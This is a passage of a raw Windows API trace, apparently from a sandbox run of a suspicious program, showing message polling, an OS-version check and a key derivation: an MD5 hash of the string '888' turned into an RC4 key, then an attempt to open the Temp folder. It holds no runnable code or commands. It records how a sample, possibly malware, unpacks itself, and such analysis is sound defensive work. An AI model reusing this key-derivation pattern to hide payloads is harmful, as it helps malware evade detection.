PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0200.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0200.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.283] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0200.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0200.283] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.283] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.283] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0200.283] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.283] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0200.283] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0200.283] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0200.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0200.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7040, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0200.283] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bef0) returned 1 [0200.284] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.284] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.284] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0200.284] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.284] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0200.284] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.284] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.284] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.284] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.284] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.284] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.285] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0200.285] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.285] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0200.285] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.285] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.285] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0200.285] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.285] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0200.285] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.286] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.286] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.286] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.286] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.286] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.294] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.295] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0200.295] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.295] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0200.295] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.295] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.295] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.295] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0200.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.295] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0200.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0200.296] CryptCreateHash (in: hProv=0xa7bef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0200.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0200.296] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0200.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0200.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.296] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.296] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.296] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.296] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.296] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0200.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaabe8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0200.297] CryptHashData (hHash=0x9e2078, pbData=0x2a71b98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.297] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.297] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.297] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.297] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.297] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0200.297] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.297] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0200.297] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0200.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaad80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0200.297] CryptDeriveKey (in: hProv=0xa7bef0, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1d38) returned 1 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.298] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.298] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.298] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0200.298] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.298] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0200.298] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0200.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0200.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0200.298] CryptDestroyHash (hHash=0x9e2078) returned 1 [0200.298] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.299] GetLastError () returned 0x5 [0200.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0200.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0200.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 